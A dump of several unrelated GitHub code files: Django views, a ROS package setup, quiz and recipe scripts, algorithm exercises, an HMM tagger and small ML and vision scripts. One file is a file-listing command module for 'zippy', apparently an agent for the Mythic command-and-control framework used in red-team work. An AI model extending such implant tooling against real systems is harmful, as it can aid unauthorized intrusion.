range(skill_max_count - len(skill_language))]\n for_range_skill_framework = [i for i in range(skill_max_count - len(skill_framework))]\n\n context = {\n 'about_sites': about_sites,\n 'about_me': about_me,\n 'skills': skills,\n 'skill_db': skill_db,\n 'skill_language': skill_language,\n 'skill_framework': skill_framework,\n 'works': works,\n 'work_contents': work_contents,\n 'for_range_skill_db': for_range_skill_db,\n 'for_range_skill_language': for_range_skill_language,\n 'for_range_skill_framework': for_range_skill_framework,\n 'for_range_li': for_range_li,\n 'contact_form': contact_form,\n 'isSuccess': isSuccess,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef WorkDetail(request, work_id):\n if request.method == 'GET':\n work = Work.objects.filter(pk=work_id)\n work_detail = SubWork.objects.filter(work_id=work[0].pk)\n img_url_root = work[0].top_image.url[:work[0].top_image.url.find(\"/\", 1) + 1]\n work = list(work.values())\n work_detail = list(work_detail.values())\n context = {\n 'work': work[0],\n 'img_url_root': img_url_root,\n 'work_detail': work_detail[0],\n }\n return JsonResponse(context)\n\n\ndef RegisterContact(request):\n if request.method == \"POST\":\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n post = contact_form.save()\n post.author = request.user\n post.save()\n contact_form.SendContactMail()\n return ContactForm()\n return contact_form\n","repo_name":"ryunoooosuke/MySite","sub_path":"myprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22096884832","text":"from setuptools import setup\n\npackage_name = 'slide_show'\n\nsetup(\n name=package_name,\n version='0.1.0',\n packages=['slide_show'],\n data_files=[\n ('share/ament_index/resource_index/packages', ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n author='Shane Loretz',\n author_email='sloretz@openrobotics.org',\n maintainer='Shane Loretz',\n maintainer_email='sloretz@openrobotics.org',\n keywords=['ROS'],\n classifiers=[\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n ],\n description='Publishes images from the file system.',\n license='Apache License, Version 2.0',\n 
tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'slide_show = slide_show:main',\n ],\n },\n)\n","repo_name":"ros2/slide_show","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21588905171","text":"from mythic_payloadtype_container.MythicCommandBase import *\nfrom mythic_payloadtype_container.MythicRPC import *\n\nimport json\n\n\nclass LsArguments(TaskArguments):\n def __init__(self, command_line, **kwargs):\n super().__init__(command_line, **kwargs)\n\n self.args = [\n CommandParameter(\n name=\"path\",\n type=ParameterType.String,\n parameter_group_info=[ParameterGroupInfo(required=False)],\n description=\"Path of file or folder on the current system to list\",\n )\n ]\n\n async def parse_arguments(self):\n\n if len(self.command_line) > 0:\n if self.command_line[0] == \"{\":\n temp_json = json.loads(self.command_line)\n\n if \"host\" in temp_json:\n self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n self.add_arg(\"file_browser\", True, type=ParameterType.Boolean)\n else:\n self.add_arg(\"path\", temp_json[\"path\"])\n else:\n self.add_arg(\"path\", self.command_line)\n else:\n self.add_arg(\"path\", \".\")\n\n\nclass LsCommand(CommandBase):\n cmd = \"ls\"\n needs_admin = False\n help_cmd = \"ls [/path/to/folder/or/file]\"\n description = \"Get a file listing\"\n version = 1\n author = \"@ArchiMoebius\"\n attackmapping = [\"T1083\"]\n supported_ui_features = [\"file_browser:list\"]\n is_file_browse = True\n argument_class = LsArguments\n browser_script = []\n attributes = CommandAttributes(\n supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],\n )\n\n async def create_tasking(self, task: MythicTask) -> MythicTask:\n\n if task.args.has_arg(\"file_browser\") and task.args.get_arg(\"file_browser\"):\n task.display_params = f'{task.callback.host}:{task.args.get_arg(\"path\")}'\n else:\n task.display_params = task.args.get_arg(\"path\")\n\n return task\n\n async def process_response(self, response: AgentResponse):\n pass\n","repo_name":"ArchiMoebius/zippy","sub_path":"Payload_Type/zippy/mythic/agent_functions/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23066056803","text":"\nclass Question:\n\n OPERATOR_SYMBOLS = {\n \"+\": \"+\",\n \"-\": \"-\",\n \"*\": \"×\",\n \"/\": \"÷\",\n }\n\n def __init__(self, operator, operand_1, operand_2, answer):\n \n self.operator = operator\n\n self.operand_1 = operand_1\n self.operand_2 = operand_2\n\n self.answer = answer\n\n @property\n def operator_symbol(self):\n return self.OPERATOR_SYMBOLS[self.operator]\n\n def __str__(self, include_answer:bool = False):\n s = f\"{self.operand_1} {self.operator_symbol} {self.operand_2}\"\n if include_answer:\n s += f\" = {self.answer}\"\n return s\n\n\n def check_answer(self, answer_guess:int):\n return answer_guess == self.answer\n\n","repo_name":"mattyhempstead/flash-trainer","sub_path":"src/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222845480","text":"from itertools import combinations\nimport sys\n\nn = int(sys.stdin.readline().strip())\ns = []\nfor _ in range(n):\n s.append(list(map(int, 
sys.stdin.readline().strip().split())))\nmin = 987654321\nteams = list(combinations(list(range(n)),n//2))\nfor team in teams:\n start = team[:]\n link = list(set(list(range(n)))-set(start))\n temp = 0\n for first in start:\n for second in start:\n temp += s[first][second]\n for first in link:\n for second in link:\n temp -= s[first][second]\n if temp < 0:\n temp *= -1\n if min > temp:\n min = temp\nprint(min)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj14889.py","file_name":"boj14889.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44462403037","text":"# https://www.acmicpc.net/problem/2357\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\narr = [int(input()) for _ in range(N)]\ntotal_binary = len(bin(N)) - 3\nmin_arr = []\nmax_arr = []\nindex = 2\nwhile index <= 2 ** total_binary:\n a = []\n b = []\n for i in range(N - index + 1):\n a.append(min(min(arr[i:i+(index//2)]), min(arr[i+(index//2):i+index])))\n b.append(max(max(arr[i:i+(index//2)]), max(arr[i+(index//2):i+index])))\n min_arr.append(a)\n max_arr.append(b)\n index *= 2\nfor i in range(M):\n a, b = map(int, input().split())\n binary = len(bin(b - a + 1)) - 3\n c = min_arr[binary - 1]\n d = max_arr[binary - 1]\n min_num = min(c[a - 1], c[b - (2 ** binary)])\n max_num = max(d[a - 1], d[b - (2 ** binary)])\n print(min_num, max_num)","repo_name":"joohyun333/programmers","sub_path":"백준/구간트리(segment tree)/최소값과 최대값.py","file_name":"최소값과 최대값.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41956759338","text":"from collections import Counter\nimport pickle\nimport numpy as np\nimport argparse\n\n# python hmm.py ./test.txt -m HMM.pkl\n\n\ndef get_hmm(corpus=None, f=None, save=False, load=False, unk=False, unk_lim=10):\n\t\n\tHMM = dict()\n\n\tif load == True:\n\t\twith open(f, \"rb\") as fh:\n\t\t\tHMM = pickle.load(fh)\n\t\treturn HMM\n\t\n\tif corpus == None:\n\t\traise RuntimeError(\"Please enter a valid filename.\")\n\t\n\tfile = open(corpus, \"r\")\n\tdata = file.read().strip()\n\tsentences = data.split(\"\\n\\n\")\n\t\n\t\n\tA = dict()\n\tB = dict()\n\tpi = list()\n\n\tfor x in range(len(sentences)):\n\t\t\n\t\ts = sentences[x]\n\t\tobs = [toks.split(\"\\t\")[0] for toks in s.split(\"\\n\")]\n\t\ttags = [toks.split(\"\\t\")[1] for toks in s.split(\"\\n\")]\n\t\t\n\t\tpi.append(tags[0])\n\t\t\n\t\tfor i in range(0, len(tags) - 1):\n\t\t\tif tags[i] not in A:\n\t\t\t\tA[tags[i]] = list()\n\t\t\tA[tags[i]].append(tags[i+1])\n\t\t\t\n\t\t\tif tags[i] not in B:\n\t\t\t\tB[tags[i]] = list()\n\t\t\tB[tags[i]].append(obs[i])\n\t\n\tfor key in A:\n\t\tA[key] = Counter(A[key])\n\t\ttotal = sum(A[key].values())\n\n\tfor key in B:\n\t\tB[key] = Counter(B[key])\n\t\tif unk == True:\n\t\t\tB[key][\"UNK\"] = 0\n\t\t\tto_pop = list()\n\t\t\tfor s in B[key].keys():\n\t\t\t\tif B[key][s] < unk_lim:\n\t\t\t\t\tB[key][\"UNK\"] += B[key][s]\n\t\t\t\t\tto_pop.append(s)\n\t\t\tfor i in to_pop: B[key].pop(i)\n\n\t\n\t\n\tpi = Counter(pi)\n\ttotal_pi = sum(pi.values())\n\tfor p in pi:\n\t\tpi[p] = pi[p]/total_pi\n\t\n\tHMM[\"A\"] = A\n\tHMM[\"B\"] = B\n\tHMM[\"pi\"] = pi\n\t\n\tif save == True:\n\t\tpickle.dump(HMM, open(\"HMM.pkl\", \"wb\"), protocol=2)\n\t\n\treturn HMM\n\t \n\n\n\n\ndef decode(inp, HMM, smooth=True, k=1):\n\t# takes input as a list of tokens from sentence\n\t\n\tA = HMM[\"A\"]\n\tB = 
HMM[\"B\"]\n\tpi = HMM[\"pi\"]\n\t\n\tT = len(inp)\n\tQ = len(HMM[\"A\"].keys())\n\t\n\ttrellis = np.zeros((Q, T))\n\tbt = np.zeros((Q, T))\n\t\n\tmapping = dict()\n\ttags = list(A.keys())\n\tfor i in range(Q):\n\t\tmapping[i] = tags[i]\n\t\n\tfor i in range(Q):\n\t\ttrellis[i, 0] = pi[mapping[i]] * ((B[mapping[i]][inp[0]] + k) / (sum(B[mapping[i]].values()) + len(tags) * k))\n\t\tbt[i, 0] = 0\n\t\t\n\tfor j in range(1, T):\n\t\t\n\t\tfor i in range(Q):\n\t\t\t\n\t\t\ttrellis[i, j] = np.max([trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]][inp[j]] + k) / (sum(B[mapping[i]].values()) + Q * k)) if inp[j] in B[mapping[i]] else trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]]['UNK'] + k) / (sum(B[mapping[i]].values()) + Q * k)) for l in range(Q)])\n\t\t\tbt[i, j] = np.argmax([trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]][inp[j]] + k) / (sum(B[mapping[i]].values()) + Q * k)) if inp[j] in B[mapping[i]] else trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]]['UNK'] + k) / (sum(B[mapping[i]].values()) + Q * k)) for l in range(Q)])\n\t\n\t\n\t\n\tpath = list()\n\tmaxi = np.argmax([trellis[l, T - 1] * ((A[mapping[l]]['.'] + k)/(sum(A[mapping[l]].values()) + k * Q)) for l in range(Q)])\n\tpath.append(maxi)\n\ti = int(maxi)\n\tfor j in range(T - 1, 0, -1):\n\t\tpath = [int(bt[i, j])] + path\n\t\ti = int(bt[i, j])\n\treturn [mapping[s] for s in path] + [\".\"]\n\n\n\n\ndef training_acc(train_doc=None, HMM=None): \n\t\n\tif train_doc==None:\n\t\traise RuntimeError(\"Please enter a valid input document.\")\n\t\n\tif HMM==None:\n\t\traise RuntimeError(\"Please provide an HMM object.\")\n\t\t\n\tfh = open(train_doc, \"r\")\n\tdata = fh.read()\n\t\n\tsentences = data.split(\"\\n\\n\")\n\t\n\tcorrect = 0\n\ttotal = len(sentences)\n\t\n\tfor s in sentences:\n\t\t\n\t\ttags = [toks.split(\"\\t\")[1] for toks in s.split(\"\\n\")]\n\t\twords = [toks.split(\"\\t\")[0] for toks in s.split(\"\\n\")][:-1]\n\t\tprint(s)\n\t\tpredicted = decode(words, HMM)\n\t\t\n\t\tif tags == predicted: correct+=1\n\t\n\treturn correct / total\n\n\n\n\n\ndef predict(test_doc=None, HMM=None, out=None):\n\t\n\tif test_doc == None:\n\t\traise RuntimeError(\"Provide a valid test document.\")\n\t\n\tif HMM == None:\n\t\traise RuntimeError(\"Please provide an HMM object.\")\n\tfo = None\n\tif out != None:\n\t\tfo = open(out, \"a+\")\n\t\n\tfh = open(test_doc)\n\t\n\tdata = fh.read().strip()\n\t\n\tsentences = data.split(\"\\n\\n\")\n\t\n\tfor s in sentences:\n\t\t\n\t\twords = s.split(\"\\n\")\n\t\ttags = decode(words[:-1], HMM)\n\t\tstring = \"\"\n\t\tfor i in range(len(words)):\n\t\t\tstring = string + words[i] + \"\\t\" + tags[i] + \"\\n\"\n\t\t\n\t\t\n\t\tif out == None:\n\t\t\tprint(string)\n\t\telse:\n\t\t\tprint(string, file=fo)\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description=\"This is a simple HMM that \\\n\t\ttrains on an input document and can then decode a hidden sequence using \\\n\t\tthe Viterbi algorithm.\")\n\n\tparser.add_argument(\"input\", help=\"Path to test file in the prescribed format.\", type=str)\n\tgroup = parser.add_mutually_exclusive_group(required=True)\n\tgroup.add_argument(\"-m\", \"--model\", help=\"Path to pickled HMM.\", default=None)\n\tgroup.add_argument(\"-ts\", \"--train\", help=\"Path to Training corpus\", 
default=None)\n\tparser.add_argument(\"-u\", \"--unk\", help=\"Threshold for replacing emissions with 'UNK'. Default is 1\", default=1, type=int)\n\tparser.add_argument(\"-k\", help=\"k value for add-k smoothening. Default is 1\", default=1, type=int)\n\tparser.add_argument(\"-s\", \"--save\", help=\"Path where to save trained model. If set to Y then a file, 'HMM.pkl' is created in the current directory.\", default=0, choices=[0, 1], type=int)\n\tparser.add_argument(\"-o\", \"--out\", help=\"Where to output the result. Provide a filepath. By default, the output is displayed at stdout.\", default=None, type=str)\n\n\targs = parser.parse_args()\n\n\tHMM = None\n\n\tif args.input == None:\n\n\t\tparser.error(\"Must provide the test file as input.\")\n\n\tif args.train == None:\n\n\t\tHMM = get_hmm(f=args.model, load=True)\n\n\tif args.model == None:\n\n\t\tsave = False\n\t\tif args.save == 1: save = True\n\t\tHMM = get_hmm(corpus=args.train, save=save, unk=True, unk_lim=args.unk)\n\n\n\n\tpredict(HMM=HMM, out=args.out, test_doc=args.input)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"justachetan/nlp","sub_path":"assn4/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"34890984762","text":"# Sarah Moore\r\n# CS 553 - West Virginia University\r\n# Developing Portable Software\r\n#\r\n# Assignment 1: Quiz Generator\r\n#\r\n \r\nfrom questionFileReader import *\r\nfrom quizController import *\r\nfrom quizLogFileGenerator import *\r\nfrom quizUI import *\r\nimport time\r\nimport platform\r\nimport sys\r\nimport argparse\r\nfrom os.path import expanduser\r\nimport multiprocessing\r\n\r\nnumberOfQuestionsToAsk = 0\r\nreadFile = True\r\n\r\ndef printIntroMessage():\r\n print(\"Welcome to the Quiz Generator Application\")\r\n print(\"Author: Sarah Moore\")\r\n print(\"Version: 2.0.0\")\r\n print(\"Release Date: 03/26/2022\")\r\n print(\"\\n\\r\")\r\n\r\ndef obtainQuestionFile(path):\r\n global readFile\r\n try:\r\n readQuestionFile(path)\r\n except FileNotFoundError:\r\n print(\"Bad File name given (%s). Please Verify this path exists and try again.\", path)\r\n readFile=False\r\n print(\"\\n\\r\")\r\n\r\ndef obtainQuizInformation(numQuestion):\r\n numberOfQuestions = getNumberOfQuestions()\r\n global numberOfQuestionsToAsk\r\n numberOfQuestionsToAsk = numQuestion\r\n \r\n \r\n if numberOfQuestionsToAsk > numberOfQuestions:\r\n print(\"Questions requested on quiz is more than the input file. 
Will only ask \" + str(numberOfQuestions) + \" questions in the quiz.\")\r\n numberOfQuestionsToAsk = numberOfQuestions\r\n return\r\n \r\n if numberOfQuestionsToAsk < 0:\r\n numberOfQuestionsToAsk = 0\r\n return\r\n \r\n\r\ndef displayMetrics(tic, toc, correct, incorrect):\r\n global numberOfQuestionsToAsk\r\n\r\n percentCorrect = (correct / numberOfQuestionsToAsk) * 100\r\n percentInorrect = (incorrect / numberOfQuestionsToAsk) * 100\r\n\r\n print(\"Quiz Metrics\")\r\n print(\"Number of Questions Asked: \" + str(numberOfQuestionsToAsk))\r\n print(\"Percentage of Correct Answers: \" + str(percentCorrect))\r\n print(\"Percentage of Incorrect Answers: \" + str(percentInorrect))\r\n print(f\"Quiz duration: {toc - tic:0.4f} seconds\")\r\n\r\ndef getReadFile():\r\n\treturn readFile\r\n\r\ndef main():\r\n global numberOfQuestionsToAsk\r\n global readFile\r\n global numberOfCorrectAnswers\r\n global numberOfIncorrectAnswers\r\n my_os = platform.system()\r\n if (my_os == 'Linux'):\r\n # Arguments:\r\n # Question File Location (required)\r\n # Number of Questions to Ask (required)\r\n # Time Limit (optional)\r\n # Location of LogFile (optional)\r\n # Display past results (optional)\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--QuestionFilePath', type=str, help='The full file path to the question file.',required=True)\r\n parser.add_argument('--NumQuestions', type=int, help='The number of questions to be asked during the quiz. Note that if the number of questions exceedes the number of question in the file, then you will just be asked the max number of questions.',required=True)\r\n parser.add_argument('--TimeLimit', type=int, help='The time limit to take the generated quiz. If no input is given, then the quiz will run until the user completes it.',required=False, default=0)\r\n parser.add_argument('--DisplayPastResults', type=str, help='Whether or not to display past results. 
The default is not to.',required=False, choices=['y', 'n'], default='n')\r\n args = parser.parse_args()\r\n\r\n printIntroMessage()\r\n obtainQuestionFile(args.QuestionFilePath)\r\n if readFile == False:\r\n quit()\r\n \r\n obtainQuizInformation(args.NumQuestions)\r\n if numberOfQuestionsToAsk <= 0:\r\n quit()\r\n\r\n qlist = getQuestionList()\r\n numberOfCorrectAnswers = multiprocessing.Value('i', 0)\r\n numberOfIncorrectAnswers = multiprocessing.Value('i', 0)\r\n \r\n if(args.TimeLimit != 0):\r\n if(args.TimeLimit <= 0 ):\r\n quit()\r\n newstdin = os.fdopen(os.dup(sys.stdin.fileno()))\r\n lock = multiprocessing.Lock()\r\n lock.acquire()\r\n p = multiprocessing.Process(target=startQuiz, name=\"startQuiz\", args=(numberOfQuestionsToAsk,qlist, numberOfCorrectAnswers, numberOfIncorrectAnswers, newstdin))\r\n p.start()\r\n tic = time.perf_counter()\r\n \r\n while ( time.perf_counter() - tic <= args.TimeLimit ) :\r\n if p.is_alive():\r\n time.sleep(0.1)\r\n else:\r\n break\r\n lock.release()\r\n p.terminate()\r\n\r\n toc = time.perf_counter()\r\n displayMetrics(tic, toc, numberOfCorrectAnswers.value, numberOfIncorrectAnswers.value)\r\n else:\r\n tic = time.perf_counter()\r\n startQuiz(numberOfQuestionsToAsk, qlist, numberOfCorrectAnswers, numberOfIncorrectAnswers)\r\n toc = time.perf_counter()\r\n displayMetrics(tic, toc, numberOfCorrectAnswers.value, numberOfIncorrectAnswers.value)\r\n \r\n \r\n generateLogFile(numberOfCorrectAnswers.value, numberOfQuestionsToAsk, args.QuestionFilePath, '/home/smoore/.quizLogfile')\r\n if(args.DisplayPastResults == 'y'):\r\n viewUserData('/home/smoore/.quizLogfile')\r\n\r\n elif (my_os == 'Windows'):\r\n startWinApplication()\r\n else :\r\n sys.exit(\"Unsupported Operating System. Please run on either a Linux or Windows environment\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"thatsmorez/quiz-generator","sub_path":"quizGenerator.py","file_name":"quizGenerator.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"39851648724","text":"row=int(input(\"Enter the number of rows : \"))\ncolumn=int(input(\"Enter the number of columns : \"))\nprint(\"Enter the matrix\")\nl=[]\nm=[]\nfor i in range(row):\n\tl=[int(x) for x in input().split(' ')]\n\tm.append(l)\n# Logic\nfor i in range(row):\n\tcol=0\n\tflag=False\n\tmin=m[i][0]\n\tfor j in range(column):\n\t\tif m[i][j]<min:\n\t\t\tmin=m[i][j]\n\t\t\tcol=j\n\tmax=min\n\tfor k in range(row):\n\t\tif m[k][col]>max:\n\t\t\tmax=m[k][col]\n\tprint('MAX = ',max)\n\tif max==min:\n\t\tflag=True\n\t\tbreak\t\nif flag:\n\tprint('SADDLE POINT = ',max)\nelse:\n\tprint('NO SADDLE POINT')","repo_name":"Mystery-2-Dev/Python_Programming","sub_path":"saddle_point_of_matrix.py","file_name":"saddle_point_of_matrix.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"11441324083","text":"# Day 8\nclass Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n n = len(points)\n if n < 2:\n return n\n\n max_points = 0\n for i in range(n):\n point1 = points[i]\n same_point_count = 1\n same_slope_count = 0\n slopes = {}\n for j in range(i+1, n):\n point2 = points[j]\n # Check if the points have the same coordinates\n if point1[0] == point2[0] and point1[1] == point2[1]:\n same_point_count += 1\n continue\n # Calculate the slope of the line defined by the two points\n slope = None\n if point1[0] == point2[0]:\n slope = float('inf')\n else:\n slope = (point2[1] - point1[1]) / (point2[0] - point1[0])\n 
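# (note: keying the dict on raw float slopes can merge nearly-parallel lines due to floating-point rounding; a reduced (dy, dx) integer pair would be a sturdier key)\n 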
# Check if we have seen this slope before\n if slope in slopes:\n slopes[slope] += 1\n else:\n slopes[slope] = 1\n # Find the maximum number of points with the same slope; default=0 covers the\n # case where every other point duplicated point1 and no slopes were recorded\n same_slope_count = max(slopes.values(), default=0)\n # Add the number of points with the same coordinates\n same_slope_count += same_point_count\n # Update the maximum number of points on a line\n max_points = max(max_points, same_slope_count)\n return max_points\n","repo_name":"aerengns/LeetCode","sub_path":"January-2023/Week2/Max-Points-On-a-Line.py","file_name":"Max-Points-On-a-Line.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"2040285281","text":"import cv2 as cv\nimport mediapipe as mp\nimport time \nimport numpy as np \nclass ColorDetection():\n def __init__(self):\n self.mycolors=[[5,107,0,19,255,255],\n [133,56,0,159,156,255],\n [57,76,0,100,255,255]] \n def findColor(self,image):\n hsv=cv.cvtColor(image,cv.COLOR_BGR2HSV)\n #lower=np.array(self.mycolors[0][0:3])\n #upper=np.array(self.mycolors[0][3:6])\n #mask=cv.inRange(hsv,lower,upper ) \n #cv.imshow('test',mask)\n for color in self.mycolors:\n lower=np.array(color[0:3])\n upper=np.array(color[3:6])\n mask=cv.inRange(hsv,lower,upper ) \n cv.imshow(str(color[0]),mask)\n#def main():\n# def empty(a):\n# pass \n# cv.namedWindow('TrackBars')\n# cv.resizeWindow('TrackBars',640,240)\n# cv.createTrackbar('Hue Min','TrackBars',0,179,empty)\n# cv.createTrackbar('Sat Min','TrackBars',0,255,empty)\n# cv.createTrackbar('Val Min','TrackBars',0,255,empty)\n# cv.createTrackbar('Hue Max','TrackBars',179,179,empty) \n# cv.createTrackbar('Sat Max','TrackBars',255,255,empty)\n# cv.createTrackbar('Val Max','TrackBars',255,255,empty) \n# while 1:\n# img=cv.imread('doaremon.jpg')\n# gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n# hsv=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n# h_min=cv.getTrackbarPos('Hue Min','TrackBars') \n# h_max=cv.getTrackbarPos('Hue Max','TrackBars') \n# s_min=cv.getTrackbarPos('Sat Min','TrackBars') \n# s_max=cv.getTrackbarPos('Sat Max','TrackBars') \n# v_min=cv.getTrackbarPos('Val Min','TrackBars') \n# v_max=cv.getTrackbarPos('Val Max','TrackBars') \n# lower=np.array([h_min,s_min,v_min])\n# upper=np.array([h_max,s_max,v_max])\n# mask=cv.inRange(hsv,lower,upper )\n# result=cv.bitwise_and(img,img,mask=mask)\n# #cv.imshow('human',img)\n# #cv.imshow('test',mask)\n# cv.imshow('result',result)\n# cv.waitKey(1)\ndef main():\n pTime=0\n cap=cv.VideoCapture(0)\n CD=ColorDetection()\n while 1:\n success,img=cap.read()\n CD.findColor(img)\n cv.imshow('Result',img)\n cv.waitKey(1)\n if cv.waitKey(20)& 0xFF==ord('d'):\n break\n cap.release()\n cv.destroyAllWindows()\nif __name__ == \"__main__\":\n main()\n","repo_name":"Shengpy/Open-CV","sub_path":"test2/Color_Detection.py","file_name":"Color_Detection.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40824640714","text":"import json\n\n\n# find all possible recipes that can be made with the current ingredients\ndef recipe_find(ingredients):\n\n # store the recipes from the json file as a list\n with open(\"recipebook.json\", encoding=\"utf8\") as read_file:\n data = json.load(read_file)\n\n recipes = data[\"recipes\"]\n\n matches = []\n\n # eliminate human error\n ingredients = list(map(str.lower, ingredients))\n ingredients = list(map(str.strip, ingredients))\n\n count = 0\n\n # add a 
recipe to matches if the user has the correct ingredients\n for x in recipes:\n count = len(x[\"ingredients\"])\n x[\"ingredients\"] = list(map(str.lower, x[\"ingredients\"]))\n c = all(i in ingredients for i in x[\"ingredients\"])\n if c is True:\n matches.append([x,0])\n else:\n # prioritize recipes in ascending order based on number of missing ingredients\n for y in x[\"ingredients\"]:\n if y in ingredients:\n count -= 1\n matches.append([x, count])\n\n matches.sort(key=lambda z: z[1])\n matches = [q for q in matches if q[1] < 4]\n return matches[:3]\n\n\n# find the YouTube thumbnail based on the link of the video\ndef thumbnail(url):\n # use a template string rather than shadowing the built-in str\n template = \"https://img.youtube.com/vi/___/0.jpg\"\n\n newStr = template.replace(\"___\", url[30:])\n\n return newStr\n\n\n# find the information of a recipe based on the name\ndef reverse_lookup(name):\n with open(\"recipebook.json\", encoding=\"utf8\") as read_file:\n data = json.load(read_file)\n\n recipes = data[\"recipes\"]\n\n for x in recipes:\n if x[\"name\"] == name:\n return x","repo_name":"jeetajmani/nwHacks-Jan2021","sub_path":"recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36156839649","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError, URLError\nfrom bs4 import BeautifulSoup\n\ndef getTitulo(url):\n ## HANDLING URL ERRORS\n try:\n html = urlopen(url)\n except HTTPError as erro:\n print(\"{ª_ª} HTTP error: \",erro)\n return None\n except URLError as erro:\n print(\"{º_º} Error in the url: \",erro)\n return None\n except:\n print(\" {/\\ __ /\\ } Sad cat error \")\n return None\n ## HANDLING ERRORS WITH beautifulsoup\n try:\n bsObj = BeautifulSoup(html.read(),\"html.parser\")\n titulo = bsObj.body.h1\n except AttributeError as erro:\n print(\"ERROR IN H1 TAG\\n:\",erro)\n return None\n return titulo\n\ntitulo = getTitulo(input(\"enter url: \"))\n\nif titulo is not None:\n print(titulo)\nelse:\n print(\"Title not found\")","repo_name":"juanengml/web-scraping-python","sub_path":"usando beautifulsoup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"20986463529","text":"import os\nimport logging\n\nanaconda = input('Do you have anaconda installed ?')\n\nif (anaconda.lower() == 'yes') or (anaconda.lower() == 'y'):\n os.system('conda create --name doc_search_env python=3.9')\n os.system('conda activate doc_search_env')\n os.system('pip install -r requirements.txt')\n\nelse:\n # logging.error('install anaconda first, It will be easy to install the environment in that case')\n print(\"\\033[91m {}\\033[00m\".format(\"install anaconda first, It will be easy to install the environment in that case \\n\"))\n print(\"\\033[92m {}\\033[00m\".format(\"After installing Anaconda run this script again!! 
\\n\"))\n # logging.info('After installing Anaconda run this script again!!')\n","repo_name":"ap539813/Document-Search-Engine-Web-Application","sub_path":"set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22958585986","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 23:59:02 2019\n\n@author: Nidhi\n\"\"\"\n\n#import nltk\nimport numpy as np\nimport random\nimport string\noutput=[]\nf=open('training.txt','r', errors='ignore').read().split('\\n')\ntrain_X=[]\ntrain_Y=[]\nfor line in f:\n idx=line.find('\\t')\n train_X.append(line[:idx])\n train_Y.append(line[idx+1:])\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nTfidfVec=TfidfVectorizer(stop_words='english')\n\ntfidf=TfidfVec.fit_transform(train_X)\n#Y=TfidfVec.fit_transform(train_Y)\nfrom sklearn.ensemble import RandomForestClassifier\nmodel = RandomForestClassifier(n_estimators=20,random_state=0)\n#Y=np.asarray()\nmodel.fit(tfidf, train_Y)\nuser_input=input()\nproduct=[]\n\nfor i in range(int(user_input)):\n user_input1=input()\n product.append(user_input1)\noutput=[]\nfor line in product:\n \n output.append(model.predict(TfidfVec.transform([line])))\nfor out in output:\n print(out+'\\n')\n \n ","repo_name":"nidhiupreti99/NLP-Challenges","sub_path":"challenge_1/Guess The flipkart query.py","file_name":"Guess The flipkart 